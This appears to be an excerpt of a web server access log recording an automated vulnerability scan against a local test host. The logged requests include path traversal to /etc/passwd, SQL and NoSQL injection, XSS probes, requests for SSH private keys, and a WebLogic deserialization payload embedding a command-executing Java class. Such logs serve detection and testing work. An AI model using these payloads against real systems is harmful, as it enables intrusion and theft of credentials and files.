BxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/297MToCwyKAZJXqYnK13xTRjh6B/);marmoset.embed(%27a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.zul HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DELETE /actuator/gateway/routes/297MTtOcjwZljtvbbbwg1qHf85k HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"DELETE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/dataSources.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"yr=2021&mh=6&fname=../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /viewlog.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt2parser.cgi?home_en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opcache-status/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysadmin/phpMyAdmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sftp-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"{\x22code\x22: {\x22$gt\x22: 0}, \x22password\x22: \x22SuperStrongPassword1\x22, \x22passwordConfirmation\x22: \x22SuperStrongPassword1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/auth/reset-password HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"getpwd=WorldFilledWithLove","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"{\x22password\x22: \x22{{password}}\x22, \x22identifier\x22: \x22{{username}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug/pyspidervulntest/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"type=login&loginCode=YWRtaW4=&pwd=MDAwMDAw&","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"xxxxorg.slf4j.ext.EventData<java><void class=\x22sun.misc.BASE64Decoder\x22><void method=\x22decodeBuffer\x22 id=\x22byte_arr\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\x22org.mozilla.classfile.DefiningClassLoader\x22><void method=\x22defineClass\x22><string>ResultBaseExec</string><object idref=\x22byte_arr\x22></object><void method=\x22newInstance\x22><void method=\x22do_exec\x22 id=\x22result\x22><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\x22java.lang.Thread\x22 method=\x22currentThread\x22><void method=\x22getCurrentWork\x22 id=\x22current_work\x22><void method=\x22getClass\x22><void method=\x22getDeclaredField\x22><string>connectionHandler</string><void method=\x22setAccessible\x22><boolean>true</boolean></void><void method=\x22get\x22><object idref=\x22current_work\x22></object><void method=\x22getServletRequest\x22><void method=\x22getResponse\x22><void method=\x22getServletOutputStream\x22><void method=\x22writeStream\x22><object class=\x22weblogic.xml.util.StringInputStream\x22><object idref=\x22result\x22></object></object></void><void method=\x22flush\x22/></void><void method=\x22getWriter\x22><void method=\x22write\x22><string></string></void></void></void></void></void></void></void></void></void></java>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal/fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=node&destination=node HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like 